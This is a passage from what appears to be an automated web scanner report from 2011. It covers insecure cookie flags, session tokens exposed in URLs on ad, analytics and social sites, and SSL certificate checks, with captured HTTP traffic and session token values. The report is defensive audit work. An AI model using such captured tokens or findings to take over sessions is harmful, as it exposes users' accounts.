If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:26:19 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

10. Session token in URL previous next
There are 7 instances of this issue:

http://charlotteobserver.adperfect.com/
http://control.adap.tv/control
http://feedburner.google.com/fb/a/mailverify
http://log.adap.tv/log
http://qlog.adap.tv/log
http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard
http://www.facebook.com/extern/login_status.php

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

10.1. http://charlotteobserver.adperfect.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://charlotteobserver.adperfect.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://charlotteobserver.adperfect.com/default.html?pubid=none&-session=ComboAd:32177B6A160c72C7C8SLM4124B7B
http://charlotteobserver.adperfect.com/password.html?-session=ComboAd:32177B6A160c72C7C8SLM4124B7B

Request

GET / HTTP/1.1
Host: charlotteobserver.adperfect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.2. http://control.adap.tv/control previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The URL in the request appears to contain a session token within the query string:

http://control.adap.tv/control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

10.3. http://feedburner.google.com/fb/a/mailverify previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://feedburner.google.com
Path:	/fb/a/mailverify

Issue detail

The response contains the following links that appear to contain session tokens:

http://feedburner.google.com/fb/a/home?gsessionid=xLQwG_KvXxSf9t9O8zC_nw
http://feedburner.google.com/fb/a/tos?gsessionid=xLQwG_KvXxSf9t9O8zC_nw

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:22:27 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=izeitgeist-ad-metrics=t0E3hsRy46s:feedburner-control-panel=xLQwG_KvXxSf9t9O8zC_nw:photos_html=gkFJwX2XgYEBqqOKgqr6OA; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Sun, 04 Sep 2011 01:22:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...
<h1><a href="/fb/a/home?gsessionid=xLQwG_KvXxSf9t9O8zC_nw">FeedBurner</a>
...[SNIP]...
<div id="footer">
©2004–2011
Google
(<a href="http://feedburner.google.com/fb/a/tos?gsessionid=xLQwG_KvXxSf9t9O8zC_nw">Terms of Service</a>
...[SNIP]...

10.4. http://log.adap.tv/log previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://log.adap.tv
Path:	/log

Issue detail

The URL in the request appears to contain a session token within the query string:

http://log.adap.tv/log?event=crossViewFilter&rs=p&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=1&serverRev=66573&playerRev=66583&eov=1315097086197

Request

GET /log?event=crossViewFilter&rs=p&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=1&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Content-Length: 0

10.5. http://qlog.adap.tv/log previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://qlog.adap.tv
Path:	/log

Issue detail

The URL in the request appears to contain a session token within the query string:

http://qlog.adap.tv/log?event=availsFailure&failureAvails=%2225857%22%3A0.05939691936008503%2C%2223193%22%3A0.023731854751251523%2C%2225858%22%3A0.05542092357376735%2C%2228180%22%3A0.7897857684152726%2C%2220137%22%3A0.00400168723473%2C%2218971%22%3A0.047632449509923264%2C%2217530%22%3A0.0053719%2C%2223208%22%3A0.014658497154970253&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=&serverRev=66573&playerRev=66583&eov=1315097086197

Request

GET /log?event=availsFailure&failureAvails=%2225857%22%3A0.05939691936008503%2C%2223193%22%3A0.023731854751251523%2C%2225858%22%3A0.05542092357376735%2C%2228180%22%3A0.7897857684152726%2C%2220137%22%3A0.00400168723473%2C%2218971%22%3A0.047632449509923264%2C%2217530%22%3A0.0053719%2C%2223208%22%3A0.014658497154970253&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: qlog.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"; asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; rtbData0="key=dataxu:value=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F:expiresAt=Wed+Nov+02+17%3A44%3A51+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Content-Length: 0

10.6. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sprint.tt.omtrdc.net
Path:	/m2/sprint/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:45:30 GMT; Path=/m2/sprint
Content-Type: text/javascript
Content-Length: 179
Date: Sun, 04 Sep 2011 00:45:30 GMT
Server: Test & Target

mboxFactories.get('default').get('sprint-interstitial-mbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315097027971-178294.19");

10.7. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=150777544942552&app_id=150777544942552&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc9d46b2c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13815c2e4%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df308fdb45c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7783dc98%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b9cd374%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&sdk=joey&session_origin=1&session_version=3

Request

GET /extern/login_status.php?api_key=150777544942552&app_id=150777544942552&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc9d46b2c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13815c2e4%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df308fdb45c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7783dc98%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b9cd374%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.196.55
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:11 GMT
Content-Length: 259

<script type="text/javascript">
parent.postMessage("cb=f7783dc98&origin=http\u00253A\u00252F\u00252Fwww.charlotteobserver.com\u00252Ff3bf22f854&relation=parent&transport=postmessage&frame=fe739c6", "h
...[SNIP]...

11. SSL certificate previous next
There are 13 instances of this issue:

https://google.com/
https://login.yahoo.com/
https://observ.subscribeobserver.com/
https://cdns.gigya.com/
https://commerce.us.reuters.com/
https://docs.google.com/
https://mail.google.com/
https://maps-api-ssl.google.com/
https://sites.google.com/
https://socialize.gigya.com/
https://subscriberservices.mcclatchy.com/
https://www.linkedin.com/
https://www.sprint.net/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

11.1. https://google.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://google.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	www.google.com
Issued by:	Thawte SGC CA
Valid from:	Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:	Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	Thawte SGC CA
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed May 12 18:00:00 GMT-06:00 2004
Valid to:	Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

11.2. https://login.yahoo.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://login.yahoo.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	login.yahoo.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Mon Dec 20 18:00:00 GMT-06:00 2010
Valid to:	Thu Jan 03 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:	Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Jan 13 13:20:32 GMT-06:00 2010
Valid to:	Wed Sep 30 12:19:47 GMT-06:00 2015

Certificate chain #3

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:	Mon Aug 13 17:59:00 GMT-06:00 2018

11.3. https://observ.subscribeobserver.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://observ.subscribeobserver.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	observ.subscribeobserver.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Wed May 11 18:00:00 GMT-06:00 2011
Valid to:	Mon May 28 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:	Mon Oct 24 17:59:59 GMT-06:00 2011

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

11.4. https://cdns.gigya.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdns.gigya.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	cdns.gigya.com,ST=CALIFORNIA
Issued by:	Akamai Subordinate CA 3
Valid from:	Wed Nov 03 05:57:58 GMT-06:00 2010
Valid to:	Thu Nov 03 05:57:58 GMT-06:00 2011

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 09:32:00 GMT-06:00 2006
Valid to:	Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:	Mon Aug 13 17:59:00 GMT-06:00 2018

11.5. https://commerce.us.reuters.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://commerce.us.reuters.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	commerce.us.reuters.com
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Sun Mar 06 18:00:00 GMT-06:00 2011
Valid to:	Tue Mar 06 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

11.6. https://docs.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.google.com
Issued by:	Google Internet Authority
Valid from:	Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:	Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:	Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

11.7. https://mail.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mail.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	mail.google.com
Issued by:	Thawte SGC CA
Valid from:	Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:	Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	Thawte SGC CA
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed May 12 18:00:00 GMT-06:00 2004
Valid to:	Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

11.8. https://maps-api-ssl.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.google.com
Issued by:	Google Internet Authority
Valid from:	Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:	Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:	Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

11.9. https://sites.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sites.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.google.com
Issued by:	Google Internet Authority
Valid from:	Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:	Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:	Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

11.10. https://socialize.gigya.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://socialize.gigya.com
Path:	/

Issue detail

